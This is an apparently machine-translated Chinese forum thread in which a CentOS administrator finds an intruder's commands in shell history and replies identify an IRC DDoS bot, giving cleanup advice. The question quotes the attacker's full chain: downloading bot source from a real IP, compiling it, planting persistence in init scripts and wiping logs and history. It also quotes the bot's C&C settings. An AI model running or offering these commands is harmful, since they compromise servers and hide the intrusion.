今天我们使用Putty远程login到CentOS服务器,并在使用向上箭头浏览之前的命令的同时,偶然发现了以下内容:
unset HISTFILE mkdir /usr/lib/tmp cd /usr/lib/tmp wget http://188.72.217.17/mzb.c -o /dev/null wget http://188.72.217.17/windef.h -o /dev/null gcc mzb.c -o /bin/bot -lpthread rm -rf mzb.c rm -rf windef.h wget http://188.72.217.17/botsupport.sh -o /dev/null chmod +x botsupport.sh mv botsupport.sh /etc/init.d/httpd2 cat /etc/init.d/network > /etc/init.d/network.bp echo \#\!/bin/sh > /etc/init.d/network echo nohup /etc/init.d/httpd2 \& >> /etc/init.d/network cat /etc/init.d/network.bp >> /etc/init.d/network cat /dev/null > /var/log/lastlog history -c nohup /etc/init.d/httpd2 &
(为清楚起见,用换行符replace&&)
我从来没有跑过这些命令,永远! 这是怎么发生的,我的服务器被黑客攻击了? 我立即改变了我的root密码,但希望有人能够在这里发生什么事情。
我看到在源代码中对ddos机器人的引用,我和我的同事都非常担心!
提前致谢!
是的,你被黑了。 黑客安装了一个IRC后门,并且连接到这个IRC服务器:
const int port = 1254; const char channel[] = "#test"; const char password[]= "pass"; const char server[] = "heathen.cc";
bot牧民可以在你的服务器上执行任何命令。 我build议closures服务器并立即重新安装。 机器人有一些DDoS攻击function,DNS洪水,syn洪水和ICMP泛滥。 它也适用于非常酷的窗口。 有一个真正旧的传播模块来感染myDoom。 这看起来像一些老的恶意软件。
答案是肯定的,你的服务器正在或已经被入侵。
您应该立即切断到服务器的Internet连接,做一个完整的备份(请记住其他文件也可能被破坏),然后重新安装。
此外,你可能想通知的IP所有者的机器人networking(或任何这是)运行。 这里是RIPE whois数据。
绝不允许通过SSH进行rootlogin。
你的问题的答案是:是的
听起来像你已经感染了BOT_VERSION
BOT_VERSION
#define BOT_VERSION "Linux/Unix IRC DDoS bot ver "BIN_VERSVION" by ["CRED"MZђ"CEND"]. Supported features : "FEATURES
你的Linux杀毒软件没有select这个吗?
我可能会在发布之前清理C&C机器的IP地址。